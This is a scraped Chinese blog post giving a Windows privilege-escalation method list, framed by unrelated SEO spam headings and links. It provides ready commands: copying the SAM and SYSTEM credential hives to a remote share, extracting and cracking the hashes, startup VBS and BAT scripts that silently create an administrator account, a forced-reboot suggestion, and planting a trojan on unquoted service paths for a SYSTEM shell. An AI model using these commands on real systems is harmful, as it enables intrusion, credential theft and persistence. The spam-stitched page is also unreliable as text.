当前位置: 首页 > news >正文

国外做婚纱摄影店设计的网站安徽seo推广公司

国外做婚纱摄影店设计的网站,安徽seo推广公司,wordpress 4.1.1漏洞,北京网站建设 专业10年Windows提权方法论 1.溢出漏洞提权2.计划任务提权3.SAM文件提权4.启动项提权5.不带引号的服务路径提权 1.溢出漏洞提权 溢出提权攻击的基本原理是,通过向目标系统发送过长的输入数据,超出了程序所分配的缓冲区大小,导致溢出。攻击者可以利用…

Windows提权方法论

  • 1.溢出漏洞提权
  • 2.计划任务提权
  • 3.SAM文件提权
  • 4.启动项提权
  • 5.不带引号的服务路径提权

1.溢出漏洞提权

溢出提权攻击的基本原理是,通过向目标系统发送过长的输入数据,超出了程序所分配的缓冲区大小,导致溢出。攻击者可以利用这个溢出的缓冲区来修改程序的执行流,使其执行恶意代码或者达到提升权限的目的

可以使用windows提权辅助工具:

windows提权辅助工具

或windows提权辅助在线搜索工具:

windows提权辅助在线搜索工具

之后可以利用EXP进行提权


2.计划任务提权

查看计算机上以管理权限运行的计划任务:

schtasks /query /fo list /v > schtasks.txt

找到Root权限运行的或其他管理员权限运行的任务:

在这里插入图片描述

直接查看导出文档的任务名:上例为\OneDrive Standalone Update Task-S-1-5-21-577854666-1229694714-980117232-1000

如果我们对以高权限运行的任务所在目录具有写入权限,就可以使用恶意程序覆盖掉原来的程序,那么任务定时执行的时候会自动执行我们的提权脚本


3.SAM文件提权

SAM和SYSTEM文件位于C:\Windows\System32\config

在这里插入图片描述

在 Windows 运行时,文件已锁定:

文件的备份可能存在于C:\Windows\Repair or C:\Windows\System32\config\RegBack

在这里插入图片描述

实战:

1、copy sam文件

copy C:\Windows\Repair\SAM  \\192.168.175.130\tools\
copy C:\Windows\Repair\SYSTEM  \\192.168.175.130\tools\

2、下载信用套件工具提取哈希

git clone https://github.com/Neohapsis/creddump7.git
python2 pwdump.py SYSTEM SAM

3、使用hashcat破解管理员用户哈希

hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da rockyou.txt

4.启动项提权

先找到系统启动项的位置:

1、Win + R 快捷键打开运行窗口

2、输入 shell:Startup,点击“确定”即可

在这里插入图片描述

3、跳转到自启动文件夹中

一般来讲,默认路径是这个:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

在启动项中创建vbs或bat脚本:

vbs:
set wshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe /c net user 用户名 密码 /add",0)
b=wshshell.run("cmd.exe /c net localgroup administrators 用户名 /add",0)bat:
net user 用户名 密码 /add
net localgroup administrators 用户名 /add

接下来需要等待机器重启并以较大权限的账号登录,暴力一点可以配合漏洞打蓝屏poc强制重启

bat脚本运行时会有个dos弹一下,vbs不会弹,建议使用vbs脚本


5.不带引号的服务路径提权

当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例

在这里插入图片描述

路径没有包含在引号中,服务会按照以下顺序依次执行:

c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

假如存在漏洞路径,我们可以将木马放到上面的路径下,然后重启机器,此时,反弹回来的shell,则是一个system的shell

使用以下命令查看系统中错误配置的路径:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
http://www.sczhlp.com/news/21401/

相关文章:

  • 用数字做域名的网站网站优化排名哪家好
  • 承德网站2022近期时事热点素材摘抄
  • 广东手机网站建设哪家专业上海今天发生的重大新闻
  • VSCode安装插件提示 Error: EPERM: operation not permitted, rename xxx -> xxx
  • C# 引用不同版本dll
  • 怎么取网页视频网站元素最好的搜索引擎
  • 十大传媒公司移动建站优化
  • 有空间怎么做网站网站如何推广
  • 新媒体做图网站seo技术培训宁波
  • 网上商城开发网站建设网站优化课程
  • 利于优化的网站高端营销型网站建设
  • 快速做网站公司哪家好女生做sem还是seo
  • 怎么让别人访问自己做的网站全网整合营销外包
  • 定制营销型网站公司长沙seo技术培训
  • B4284 [蓝桥杯青少年组省赛 2022] 组合 题解
  • 如何基于 AI 给的基础模型,做出令审稿人眼前一亮的创新点
  • 网站视频转码软件百度指数首页
  • 湖南网站优化服务上海网络推广外包
  • 微信网站开发工具湖北百度seo
  • 广州市提取住房补贴建设银行网站市场营销培训
  • 沈阳妇幼保健院人流价格表专业seo外包
  • 做弹幕视频效果的网站seo积分系统
  • 网站收录入口申请查询高粱seo博客
  • 做新房用哪个网站好网络营销最基本的应用方式是什么
  • 网上做网站怎么做下拉菜单网站制作优化排名
  • 网站排名推广自己怎么做百度如何优化排名靠前
  • 烟台百度网站建设百度关键词搜索推广
  • 做篮球管理网站的步骤网站秒收录工具
  • 12306网站开发山东网络推广网站
  • 常用网站推广方法的适用性淘宝seo排名优化软件